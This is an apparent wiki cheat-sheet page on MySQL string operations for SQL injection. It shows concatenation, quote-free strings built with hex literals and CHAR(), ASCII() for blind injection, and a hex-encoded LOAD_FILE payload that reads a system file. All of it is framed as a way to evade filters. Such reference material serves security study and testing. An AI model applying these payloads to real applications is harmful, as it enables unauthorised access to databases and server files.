User Tools

Site Tools


hacking:sql_injection:mysql:string_operations

Hacking - SQL Injection - MySQL - String Operations

String related operations can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.

String Concatenation

||
 
SELECT login || '-' || password FROM members

NOTE: About MySQL “||”

If MySQL is running in ANSI mode it's going to work but otherwise MySQL accepts it as a `logical operator` and will return 0.

A better way to do it is using CONCAT() function in MySQL:

CONCAT(str1, str2, str3, ...) (M) 
 
/* Concatenate supplied strings. */
SELECT CONCAT(login, password) FROM members

Strings without Quotes

These are some direct ways to using strings but it's always possible to use CHAR() to generate string without quotes.

0x457578 /* Hex Representation of string. */
 
SELECT 0x457578 /* This will be selected as string in MySQL.*/

In MySQL easy way to generate hex representations of strings use this;

SELECT CONCAT('0x',HEX('c:\\boot.ini'))
 
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) /* This will return 'KLM'. */

Hex based SQL Injection Samples

SELECT LOAD_FILE(0x633A5C626F6F742E696E69) /* This will show the content of c:\boot.ini */

Return ASCII character value of leftmost character.

ASCII()
 
SELECT ASCII('a')

A must have function for Blind SQL Injections.


Convert an integer of ASCII.

CHAR()
 
SELECT CHAR(64)
hacking/sql_injection/mysql/string_operations.txt · Last modified: 2020/07/15 09:30 by 127.0.0.1

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki